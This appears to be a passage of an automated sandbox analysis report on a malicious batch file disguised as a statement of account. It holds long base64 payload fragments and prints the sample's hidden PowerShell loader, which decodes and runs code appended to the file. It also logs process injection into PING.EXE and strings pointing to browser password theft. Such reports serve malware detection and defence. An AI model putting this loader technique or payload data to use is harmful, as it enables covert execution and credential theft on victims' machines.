GWjWoXcLmm9alluzJDPyge5L66XZzKn+Jn0cUtvxz+fptqLINJGlgKpOWBZuZJvoede3EtzVuJYHg+OseuZl8O9ISBRoTaW2c5ZiMNNZUL84z2ZKrLa/XDPAI8kXfWfE6kUEgEnM9GzlPz1aRBRKS1CT2tdwfE/Ws4sueZOR0KtsDhrdZQfjey6TpBHfIK2jYgdMxzcYVMp/Ck5R3ZEMPTHopVKCjxpkpI8iPnJLIOxde54OqKjoSNq3tTvEFIEvEsjuR7rwl8ltzpUzu51eQV5Xt/rOFjKoHlNEFtFVPTSO0n4sBIXrvo5QIt+Z7TGPvz2QkMSYq+eFmWQS0J1v0jHtBU7rRRmyHJeJuipubogFZ02Of/1ObhXyh9NuiRWljLdQAM4KcxfpdrnHKnb78fF/5bleNy1N4ii6su07lLoz7tJc9DXwoEK6JAXin+EE7REGuWslyMDrdq6UCtXcIbmiFRqPEJ5APzP5o2OqwPZ7Qwrb2FgeNhoogo9zs7L7UkLobSgiqG/chcS/RYkBX9uhLDnRfdh0G7i4b40L/Fb1E0EAPLos/X64mMhmaWxIZ5PaarQNBFpTOUscuBglKF8KXx5ZPSuJCpUhF+P5NTIN1oScCm3Ynd1lenKLxONXP0rfzg9vfSGGA6aNXoe9aM5FMkzgAqZLmGFnfcLX3/M/17Ay6PANX/bbPQ3fH4R5N/+UiSduAxzEs4b9HFr5XpUOJ2iBB+VRaSdwh96/qZQCGXxMqjYmtdr9yKEkyismXQy4oP1Jwzt+wQDWCzK/MuJmwdyUJtpY/KjLmvspmi8KAs2jBO0Fp6K7Jl+I7stIdonizaLsNAFz9GgV+8A1QMBR0NjyT8XyAAERcur796t6TIcTtqMDjxhErWBgfxVu6Q5tuIAyMdmE60xuRJO8VgIBToJEEM2EO2xX5GCT6MUZbJP5UYVnJOUm2ZuDMJVbRxhAkbFcgxjiQYEuca/3xS2MyviBP55cPOblyonLTkVBUz2a1feNnWAC69QL8zz8dFtdQG3WcHSkxlBNHe2kwvj624zAJVgEeVr9d+/Tu0cYR+qiu3An5IS0qP/kj/TqaHIYNFuOEABvtCXYBNBrH6yFgtlwBFzgbRV6melWG2GfIQTJfWq7aP3ZOlSKg2A8EFsCMNvOFIu3guXVfGAZZPTh0BhMTd6fDaFxo6k9RNJHNSr+/WLX4QpfLSWV6LocJvWZy2KVo/zbG2SmCXasfWvmWD+ACZYjix5EvCjvM2zKxYX7u9Ya9vUAQHARXb0tQPElQyYVaIuY/bN+ITOOpSaEjTJoT0NKJrehEvkTVXBFnWiVPk9w9/51KDVX/uhCgKoZ6+6aQCwgnH0t+E6tCOPo3X98ND3zJjfU+wEpYNcd90+xGHGx3reEPEloRpBcNlmE3M+qz7+wbVZ6VBYh8hv6+da9mLjfd/Xq7ivWuZO3X2lsyHX+/qFrWSDOfyI4aYuiI9CLMAQVGqgt7VUXlB1MtGo2x7OLPoxNo4zHp3O9N0rgBo8rHBQoSSMihX83KlM4BUEBNLUQd5zrXzuR4x9/LM7gkA/RfAQyJXvJk1tDRgG3/T++6wEdlUC2Bqk0hr4mHMvORwkaLM9H5bXC/ULofj6BtMNIu7JKBdHDXQgGcizt49qMGPLop8U9rM6hDQrWGpMaAzyrqVv5T2voFmkocK7oEiyz+Nv/yfLKOV5urtNe2zmL2sZvZbv2+3xQurrvX4lbQVDL8X8aAj0DyaagWXbrL9TwtFIYBng2ScRYYUW2C+zeD+NBN5uzSj817juU2V6L3Arh2/qzf3GP+kXNzWpUni980XNptuuyRPdnArm7uZ5/ENksc+voT75dXeheXZGUlUomAZf0BdD1/YcBVXsmxnVU2R871KvRMJT9
                Source: 8.2.PING.EXE.6900000.1.raw.unpack, --.csBase64 encoded string: 'hvJiJDjgBSyZXpM/lVDzZRt3VfbRZfcc++CcWOsiv4itkSbLzDSObvC899a2Ybp8'
                Source: ilgwppf0.dll.9.dr, cdXfw.csBase64 encoded string: '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
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winBAT@17/17@3/4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\SnFvakRPVEJj.lockJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6708:120:WilError_03
                Source: C:\Windows\SysWOW64\PING.EXEMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6888:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nxnqusfz.0zo.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat" "
                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "ping.exe")
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: PING.EXE, 00000008.00000002.3328916486.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004704000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.0000000004710000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.00000000046DF000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000008.00000002.3328916486.00000000046C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SOA Since OCT DEC 241738316681530012900.batReversingLabs: Detection: 31%
                Source: SOA Since OCT DEC 241738316681530012900.batVirustotal: Detection: 45%
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM ping.exe /F
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.cmdline"
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD873.tmp" "c:\Users\user\AppData\Local\Temp\ilgwppf0\CSCDCE9C332863C4D8BB51C4E706A50F0F.TMP"
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERSHEll -W h -COMmAnd "$WnordsrAlZoeriJHdDFkhPjtOFOv='C:\Users\user\Desktop\SOA Since OCT DEC 241738316681530012900.bat';$RluHfbONocRBKtFAQykvSfeFXskG=-254500..-1;$DvcYeviAehzPTwTBlDZnJicPUSdm=[sySTem.TEXt.EncOdinG]::UTf8.GetsTriNg([CONVerT]::FROmBaSe64STRinG((GeT-cOnTeNt $WnordsrAlZoeriJHdDFkhPjtOFOv -Raw)[$RluHfbONocRBKtFAQykvSfeFXskG]));iex $DvcYeviAehzPTwTBlDZnJicPUSdm"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM ping.exe /FJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -tJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilgwppf0\ilgwppf0.cmdline"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -tJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD873.tmp" "c:\Users\user\AppData\Local\Temp\ilgwppf0\CSCDCE9C332863C4D8BB51C4E706A50F0F.TMP"Jump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXESection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
